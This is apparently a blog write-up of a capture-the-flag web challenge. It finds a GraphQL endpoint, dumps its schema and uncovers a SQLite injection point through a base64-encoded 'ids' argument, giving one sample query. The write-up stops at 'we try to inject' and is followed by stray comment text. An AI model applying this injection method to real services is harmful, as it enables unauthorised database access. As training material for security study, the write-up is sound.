Challenge:
No description.
http://47.74.147.34:20011
Well, another site :D, after surfing, check burp history and something interesting appear:
I saw this type of query before, it absolutely using GraphQL to perform the query.
After dumping all the __schema of GraphQL without seeing anything suspicious or authorization vul, im thinking about this website will be vulnerable in the backend database.
Testing NoSQL Injection, no luck. Time to fuzzing!
Wow, SQLite error, it is happenned because we input a fail object to query, a little skill will tell you “aYT0x” stands for “a”+atob(“YT0x”) = “a”+”a=1”
Interesting!
So now we know what to inject, but look at some input point, it all use sqlite binding param, so we cant do anything in this.
Dumping schema, notice that (thanks to my respectable bro):
{“name”:”itemSelection”,”description”:”List details for BlogItems in comma separated list of ID!s”,”args”:[{“name”:”ids”,”description”:null,”type”:{“kind”:”NON_NULL”,”name”:null,”ofType”:{“kind”:”SCALAR”,”name”:”String”,”ofType”:null}},”defaultValue”:null}],”type”:{“kind”:”LIST”,”name”:null,”ofType”…….blah….blah……
So we know we can construct a new query based on this:
query={ itemSelection(ids:”bYT0x”) { title } }
luckily, this point isnt care about sqlite injection, so we try to inject:
😀
Tsu BlogS ٩(^‿^)۶ 
Welaimkale
LikeLike
sup?
LikeLike